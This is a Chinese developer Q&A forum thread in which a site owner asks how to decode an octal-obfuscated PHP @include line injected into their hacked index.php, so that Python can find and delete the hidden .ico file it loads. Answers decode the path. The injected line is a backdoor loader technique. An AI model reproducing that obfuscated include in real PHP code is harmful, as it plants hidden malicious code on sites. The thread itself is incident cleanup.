问答博客资讯标签用户活动
logo极客观点logo项目管理logoHarmonyOS
javascript
前端
python
node.js
react
vue.js
php
laravel
go
人工智能
mysql
linux
ios
java
android
css
typescript
spring
程序员
logoONES 研发管理logo思否企业问答logo安谋科技 XPU

网站被入侵了,php脚本添加了一段代码

头像
喜剧之王
    18943744

    /home/wwwroot/index.php被添加如下代码

    
<?php
@include "\057home\057wwwr\157ot/b\150obo2\06345.c\157m/e/\151nsta\154l/.9\066ceb7\1423.ic\157";

    请问这个路径怎么转换成正常路径,功力不够写不出代码,请教各位大神了。

    需求:用python匹配出来被转义过的路径,并删除这个文件

    我自己写的:

    # encoding=utf-8
import re
import os
import shutil
import sys
import getopt

reg = re.compile(r'@include[\s\S]+"(.*?)";', re.DOTALL)

with open('/home/wwwroot/index.php','rb') as f:
    con = f.read()
    r_in = reg.search(con)
    include_file = r_in.groups()[0]
    print include_file
    #转义成正常路径,这里不知道怎么写了
    true_path = ''
    os.remove(true_path )
    pythonphp
    阅读 2.7k
    3 个回答
    得票最新
    头像
    PFinal南丞_
      50719

      正确路径应该是:

      /home/wwwroot/bhobo2345.com/e/install/.96ceb7b3.ico

      Python代码:

      #!/usr/bin/python
# -*- coding: UTF-8 -*-
import re
str = "\057home\057wwwr\157ot/b\150obo2\06345.c\157m/e/\151nsta\154l/.9\066ceb7\1423.ic\157"
print(str)
print(re.search(r"\057|\/",str))

      不知道对是否在你的情况中是否正确,你试试吧

      头像
      小黄驴
        39016

        使用了8进制表示其中的字符,和二进制是等价的,如下图浏览器中的截图
        clipboard.png

        撰写回答
        你尚未登录,登录后可以
        • 和开发者交流问题的细节
        • 关注并接收问题和回答的更新提醒
        • 参与内容的编辑和改进,让解决方法与时俱进
        推荐问题